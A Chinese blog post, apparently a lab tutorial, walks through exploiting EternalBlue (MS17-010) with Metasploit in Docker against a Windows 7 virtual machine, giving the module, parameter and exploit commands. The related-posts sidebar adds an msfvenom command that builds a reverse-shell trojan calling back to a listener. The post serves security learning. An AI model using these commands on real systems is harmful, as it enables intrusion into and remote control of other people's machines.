docker使用metasploit进行“永恒之蓝”复现

最新推荐文章于 2023-06-06 17:45:23 发布
最新推荐文章于 2023-06-06 17:45:23 发布
阅读量710 收藏 1
点赞数
分类专栏: Web安全 文章标签: docker linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45031509/article/details/125772404
版权

docker使用metasploit进行“永恒之蓝”复现

1.实验环境

  • win7虚拟机
  • Ubuntu虚拟机
  • 在Ubuntu上安装的docker
  • 在docker中安装的metasploit

2.实验过程

  • 进入root权限,查看docker镜像,查看metasploit的镜像id
使用命令
#sudo su
# docker images

在这里插入图片描述

  • 运行metasploit容器
# docker run -it -p 443:443 edbbfac76261

在这里插入图片描述

  • 搜索“永恒之蓝”漏洞的攻击有那些
    永恒之蓝的代号为“ms17_010"
search ms17_010

在这里插入图片描述

  • 选择第一种攻击方式
use exploit/windows/smb/ms17_010_eternalblue
show options

show options 可以看我们需要填那些参数,其中在require一栏,为yes的是必填的。
rhost:远程主机的IP地址
lhost:本机的IP地址
lport:本机的端口地址
在这里插入图片描述

  • 设置好各种需要的参数
    这里远程被攻击的主机为192.168.30.129
    特别注意
    docker里面的容器要和外界进行通信时需要进行端口映射的,容器使用docker的网络端口接收数据,在通过端口镜像来映射到容器当中的。所以在填写IP与端口是需要填写docker的IP,和docker与容器映射的端口,而不是容器的IP与容器的端口。
    在这里插入图片描述
  • 开始监听
exploit

在这里插入图片描述

  • 连接成功过后就可以通过命令行获取主机的信息了,这里就例举了一个例子
sysinfo   获取主机的信息

在这里插入图片描述

remandancy.h
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
MetasploitDocker安装及其Eternal Blue(永恒之蓝)渗透实现
Mi1k7ea
08-11 7685
Docker上pull下来的msf是默认已带有ms17_010_eternalblue利用模块的,这里就简单地演示一遍该模块来获取win7的shell。 Pull并安装msf容器: 先查找docker上的Metasploit镜像: docker search metasploit 选择第一个pull就好: docker pull linuxkonsult/kali-metasp
dockerfile-msf:该Dockerfile构建了一个安装了Metasploit-Framework的基于Debian的Docker容器。 在任何设备上(包括Linux,MacOS或Windows)部署Metasploit的快速简便方法!
05-23
Metasploit框架dockerfile 目的 该Dockerfile构建了一个安装了Metasploit-Framework的基于Debian的Docker容器。 在任何设备上(包括Linux,MacOS或Windows)部署Metasploit的快速简便方法! MSF通过以下方式自动启动: 安装所有依赖项, 启动时自动更新, 与本地Postgres数据库的连接, 卷,以共享数据并访问您的自定义Metasploit脚本。 它还包括: tmux,在容器内使用多个窗口(msfconsole,shell等); nmap,著名的网络扫描仪(与ncat一起); nasm,以支持自定义编码器; 配置文件以在Metasploit中获得改进的提示,并带有时间戳和会话/作业状态。 用 该映像每天由Docker Hub构建,位于我的github存储库的Dockerfile上。 该
docker安装metasploit
qq_45031509的博客
07-12 1184
docker的简单安装
Docker Metasploit Framework
weixin_30314793的博客
04-26 276
https://hub.docker.com/r/usertaken/metasploit-framework/ docker pull usertaken/metasploit-framework Latest Nmap and Metasploit Framework from GitHub with Armitage teamserver. Seperate Postgre...
永恒之蓝复现
Seizerz的博客
09-09 444
一、漏洞介绍 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密...
Docker配置&使用&实战
08-09
Docker使用实战 一、 Docker相关概念 二、 Docker安装 三、 Docker常用命令 四、 Dockerfile编写 五、 部署私有Docker registry 六、 常用镜像
Docker使用的个人学习总结
09-30
最近时不时会用到很多开发工具,无奈装了太多无用软件,所以不想安装太多开发软件在电脑上,所以想到了用docker容器来配置开发环境适应不同开发内容,这篇文章主要给大家总结了关于Docker使用的一些个人学习知识点,...
使用 Docker 部署 Django web 应用.zip
最新发布
01-09
使用 Docker 部署 Django web 应用.zip使用 Docker 部署 Django web 应用.zip使用 Docker 部署 Django web 应用.zip使用 Docker 部署 Django web 应用.zip使用 Docker 部署 Django web 应用.zip
10个日常Docker使用技巧
02-26
我有机会建立一个以Docker为基础的微服务架构在我现在的工作中,很多人都会分享他们使用Docker的心得,我想我也不会例外。因此我总结了一些,可能你会在日常使用Docker的时候会用到。如果你想运行多个Docker容器在一...
使用Ansible高效交付Docker容器
02-26
Ansible是一个与Docker高度兼容的自动化工具,它使用一个强大的接口来管理远程服务器上的容器。在本文中,我将探索为何和如何使用Ansible的可扩展设计来将Docker和Ansible的最佳功能合并在一起。Docker之所以如此...
轻松使用Docker容器运行Metasploit框架轻松使用Docker容器运行Metasploit框架
weixin_34381687的博客
09-26 682
本文讲的是轻松使用Docker容器运行Metasploit框架轻松使用Docker容器运行Metasploit框架,【编者的话】Lenny Seltzer是信息安全技术方面的资深专家与企业家。他涉及的领域包括紧急事件响应,云服务和产品管理。Lenny在NCR集团专注于客户安全操作。他还在SANS学院教授数字取证技术与反间谍软件。Lenny积极参与各种会...
永恒之蓝漏洞复现
weixin_44897902的博客
09-23 247
参考: https://blog.csdn.net/n5xxxx__zy/article/details/90705057 目标ip:192.168.91.149 攻击机:192.168.91.146 目标系统:win7 攻击机:kail 准备工作: 目标机:win7开启网络共享:控制面板-网络和共享中心-更改高级共享设置-启用网络发现-关闭密码保护共享-保存修改 攻击机:开启postgres...
三、漏洞编号为CVE-2017-7494的复现永恒之蓝)(Linux)(Ubuntu16.04.4)
qwsn
10-15 4051
一、漏洞分析 1.漏洞别名: CVE-2017-7494称为Linux版的永恒之蓝 2.漏洞用来做什么: 该漏洞用来,远程反弹shell并提权 3.漏洞适合的环境: Samba 3.5.0到4.6.4/4.5.10/4.4.14的中间版本。 //也就是Samba 3.5.0之后的所有版本,在4.6.4/4.5.10/4.4.14修复了这个漏洞。 二、漏洞环境复现 1.相关信息: ①IP地址...
centos 6中安装docker,在docker中安装metasploit
weixin_30642869的博客
07-12 77
1、升级内核,2、安装ruby,3、安装docker,4、在docker中下载metasploit 首先检查内核版本,内核版本Linux kernel至少3.8以上 uname -r 我的因为安装bbr升级了内核,所以不用升级内核 CentOS6下安装docker - CSDN博客https://blog.csdn.net/Smith_My_/article/details/7355082...
体验一把黑客的感觉——Unbuntu下用docker搭一个肉鸡(Metasploitable)来练靶(渗透测试)
m0_74942241的博客
06-06 723
本文介绍在Unbuntu环境下用docker来简单快速地搭建Metasploitable系统,并用Metasploit进行渗透测试。Metasploitable是一个供渗透测试用的、集成各种漏洞的Linux系统。Metasploita则是一个集成各种漏洞攻击的渗透利器。
Docker版kali内安装metasploit
wdsj_xh的博客
06-20 2441
原文链接:http://securityer.lofter.com/post/1d0f3ee7_dd9fd9c 1.下载原版kali Docker镜像 MacPC:~ liuxin$ docker pull kalilinux/kali-linux-docker 2.进入docker kali 容器内 MacPC:~ liuxin$ docker run -it--name=kal...
永恒之蓝EternalBlue(ms17-010)复现
yiyiiyiy的博客
11-24 5177
前言 漏洞描述Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,电脑只要开机,攻击者就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。漏洞复现 环境搭建角色 系统版本 IP 备注 靶机 windows 7 (x64) 192.168.198.131 打开445端口,关闭防火
2022-10-02笔记(linux&&kali安装docker&&vulhub、s2-001、s2-057、永恒之蓝常用模块)
qq_45751902的博客
10-03 1171
docker exec -it e8f4844aabc1 /bin/bash #进入容器(id:e8f4844aabc1)docker stop 3b41c0c08430 #关闭容器(id唯一标识,建议使用id)#kali中,使用浏览器访问http://IP #IP可为127.0.0.1。docker --help #查看docker命令。
kali使用msf简单制作木马
热门推荐
m0_53820621的博客
11-15 1万+
命令: 废话不多说,直接上命令: msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.10.166 lport=4444 -f exe -o /root/csdn.exe 命令分解: msfvenom #使用msf中msfvenom模块 -a #指定架构(x86指32位,x64为64位,建议x86,因为x64兼容x86,在不知道目标机架构的情况下x86更为合适) -p #指定p
如何使用idea进行docker部署
06-10
使用 IntelliJ IDEA 进行 Docker 部署,需要进行以下步骤: 1. 安装 Docker 首先需要在本机安装 Docker,确保可以使用命令行工具来管理 Docker 容器。 2. 安装 Docker Integration 插件 在 IntelliJ IDEA 中,需要安装 Docker Integration 插件。可以通过菜单栏中的 File -> Settings -> Plugins 进行插件的安装。 3. 创建 Dockerfile 在 IntelliJ IDEA 中,可以通过右键点击项目名称 -> New -> File 来创建一个 Dockerfile。 4. 编写 Dockerfile 在 Dockerfile 中定义 Docker 镜像的构建过程。可以参考以下示例: ``` FROM openjdk:8-jdk-alpine VOLUME /tmp ADD target/myapp.jar app.jar EXPOSE 8080 ENV JAVA_OPTS="" ENTRYPOINT ["java","-Djava.security.egd=file:/dev/./urandom","-jar","/app.jar"] ``` 5. 构建 Docker 镜像 在 IntelliJ IDEA 中,可以通过右键点击 Dockerfile -> Build Image 来构建 Docker 镜像。 6. 运行 Docker 容器 在 IntelliJ IDEA 中,可以通过右键点击 Docker 镜像 -> Run 来启动 Docker 容器。 以上就是使用 IntelliJ IDEA 进行 Docker 部署的基本步骤。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

remandancy.h

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值